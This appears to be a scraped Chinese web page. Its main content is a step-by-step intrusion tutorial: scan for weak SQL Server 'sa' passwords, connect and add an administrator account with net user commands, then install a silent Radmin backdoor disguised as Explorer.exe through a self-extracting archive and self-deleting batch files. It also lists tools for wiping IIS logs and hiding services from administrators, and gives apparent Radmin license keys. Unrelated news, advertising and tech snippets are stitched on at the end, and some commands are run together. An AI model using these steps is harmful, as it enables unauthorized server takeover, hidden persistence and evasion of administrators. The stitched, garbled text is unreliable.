工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:
08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)
二.用SQLTOOLS连上去建一个用户
net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员
三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)
*** RAD.EXE过程:
1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;
4、编写一个批处理,并命名为u.bat;
@echo offnet stop r_server
5、写第二个批处理,r.bat,内容为:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;
7、将Rad.rar *** 成自解压文件;
选择Default.sfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:r.bat 释放前运行u.bat
-->>摸式
缄默模式:全部隐藏 覆盖方式:覆盖所有文件
中新社北京11月9日电 中国外交部发言人汪文斌9日晚就世卫大会续会涉台问题发表谈话。 汪文斌指出,刚刚举行的第73届世界卫生大会续会总务委员会和全会分别作出决定,拒绝将个别国家提出的所谓“邀...
目前市场上已经有一部分投资人认识到证券配资公司,但大部分人还没有接触到证券配资这项业务。很多投资人都想了解证券配资平台会亏损吗?证券配资平台怎么算亏损呢?下面就为大家详细解答相关疑惑。 证券配...
别人是通过什么方式来知道你的行踪的,如何知道一个人的行踪的软件有没有,随着互联网技术的发展以及存储和分析能力的不断提高,大数据已成为该国和社会各行各业的必需品,通过大数据,可以清楚地检索,分析和判断每...
许多用户在日常办公的时候,可能都会用到投影仪进行投屏,可以通过VGA线或者HDMI线,连接笔记本和投影仪,然后通过快捷键来进行切换等,但是很多用户不知道笔记本投影快捷键是什么吧,不同品牌笔记本快捷键不...
你知不知道手机上有一个软件叫做中国大学mooc,那里面有很多讲解黑客的知识,你好好学习一下。 有全套教程。需要付费 现在商家都会提供WiFi接入服务,为了防止蹭网的情况发生,商家也会设置密码。而黑客就...
B,数据链路层协议。数据链路层协议包括点对点协议(Point-to-PointProtocol);以太网(Ethernet);高级数据链路协议(Hi。 slip表示“滑倒”slide表示“滑动”它们的...